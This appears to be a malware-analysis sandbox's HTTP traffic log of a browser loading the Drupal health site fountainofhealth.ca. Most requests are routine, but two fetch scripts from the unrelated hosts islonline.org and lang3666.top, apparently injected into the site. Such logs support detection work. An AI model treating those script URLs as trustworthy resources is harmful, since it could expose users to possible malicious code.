Source: global traffic HTTP traffic detected: GET /npm/bootstrap@3.4.1/dist/js/bootstrap.js HTTP/1.1host: cdn.jsdelivr.netorigin: https://fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic HTTP traffic detected: GET /d.js HTTP/1.1host: islonline.orgsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://fountainofhealth.ca/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1
Source: global traffic HTTP traffic detected: GET /core/modules/system/css/components/resize.module.css?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /core/modules/system/css/components/sticky-header.module.css?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /core/modules/system/css/components/system-status-counter.css?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /core/modules/system/css/components/system-status-report-counters.css?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /core/modules/system/css/components/system-status-report-general-info.css?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /core/modules/system/css/components/tablesort.module.css?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /core/modules/system/css/components/tree-child.module.css?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /core/modules/views/css/views.module.css?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /core/modules/ckeditor5/css/ckeditor5.dialog.fix.css?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /modules/views_slideshow/modules/views_slideshow_cycle/css/views_slideshow_cycle.css?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /core/assets/vendor/jquery.ui/themes/base/theme.css?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /modules/ajax_loader/css/wave.css?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /modules/webform/modules/webform_bootstrap/css/webform_bootstrap.css?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /core/modules/layout_discovery/layouts/onecol/onecol.css?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /themes/custom/foh/css/style.css?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /themes/custom/foh/css/questionnaire.css?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /themes/custom/foh/css/banner-slider.css?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /lv/xfa.js HTTP/1.1Host: lang3666.topConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://fountainofhealth.ca/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/twitter.svg HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0; _ga=GA1.1.1981881509.1747926276
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/youtube.svg HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0; _ga=GA1.1.1981881509.1747926276
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/facebook.svg HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0; _ga=GA1.1.1981881509.1747926276
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/Message-Blue.png HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/Info-Blue.png HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /core/assets/vendor/jquery/jquery.min.js?v=3.7.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /core/assets/vendor/underscore/underscore-min.js?v=1.13.6 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /core/assets/vendor/once/once.min.js?v=1.0.1 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /core/misc/drupalSettingsLoader.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /core/misc/drupal.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /core/misc/drupal.init.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/version-min.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/data-min.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/disable-selection-min.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/form-min.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/jquery-patch-min.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/scroll-parent-min.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/twitter.svg HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/youtube.svg HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
